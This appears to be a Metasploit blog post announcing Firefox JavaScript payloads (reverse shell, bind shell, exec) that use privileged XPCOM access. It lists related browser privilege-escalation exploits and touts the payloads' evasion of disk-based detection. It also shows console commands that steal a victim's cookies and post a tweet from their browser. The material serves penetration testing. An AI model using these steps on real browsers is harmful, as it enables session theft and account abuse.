Those of you with a keen eye on metasploit-framework/master will notice the addition of three new payloads:

  • firefox/shell_reverse_tcp
  • firefox/shell_bind_tcp
  • firefox/exec

These are Javascript payloads meant for executing in a privileged Javascript context inside of Firefox. By calling certain native functions not meant to be exposed to ordinary web content, a classic TCP command shell can be opened. To a pentester, these payloads are useful for popping platform-independent in-process shells on a remote Firefox instance.

How does it work?

Firefox contains a Javascript API called XPCOM which consists of privileged native methods primarily implemented as C bindings. This API is commonly invoked by Firefox Addons and is also used by the "glue" code running inside the Firefox browser itself. If you can find a way to run Javascript code with access to XPCOM - either by convincing the user to install an untrusted addon or by finding a privilege escalation exploit in Firefox itself - you can open a raw TCP socket and run executables with Javascript. By using some shell redirection, we can get a working command shell connection back to a metasploit instance. We currently have three Firefox privilege escalation exploits in the framework:

  • exploit/multi/browser/firefox_svg_plugin (Firefox 17.* Flash)
  • exploit/multi/browser/firefox_proto_crmfrequest (Firefox 5-15.*)
  • exploit/multi/browser/firefox_xpi_bootstrapped_addon (all versions)

Why is it better?

The Javascript payloads are able to maintain shell sessions without dropping a native exe to the disk, which makes their presence significantly harder to detect. Another immediate benefit is that our existing Firefox exploits can now be included in BrowserAutopwn, since the target is static. Additionally, since the payload still has access to the Firefox Javascript environment, we can just as easily eval Javascript code, which makes things like cookie extraction or XSS attacks very easy. As an example I wrote a post module, post/firefox/gather/xss. To use it, simply specify the URL you want to run under and specify a SCRIPT option. The SCRIPT will be eval()'d by the payload and any results will be printed:

msf> use post/firefox/gather/xss
msf> set SESSION 1
msf> set URL
msf> set SCRIPT "send(document.cookie);"
[+] id=f612814001be908ds79f

Or, with a slightly more advanced script which sends a tweet in the target browser:

msf> set URL
msf> set SCRIPT "$('.tweet-box').find('.tweet-box').focus().text('Metasploit Courtesy Tweet').parents('form').find('.tweet-button button').click(); return 'sent';"
[+] sent

Note: You can use return or send to send back data, but you can only send once.

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.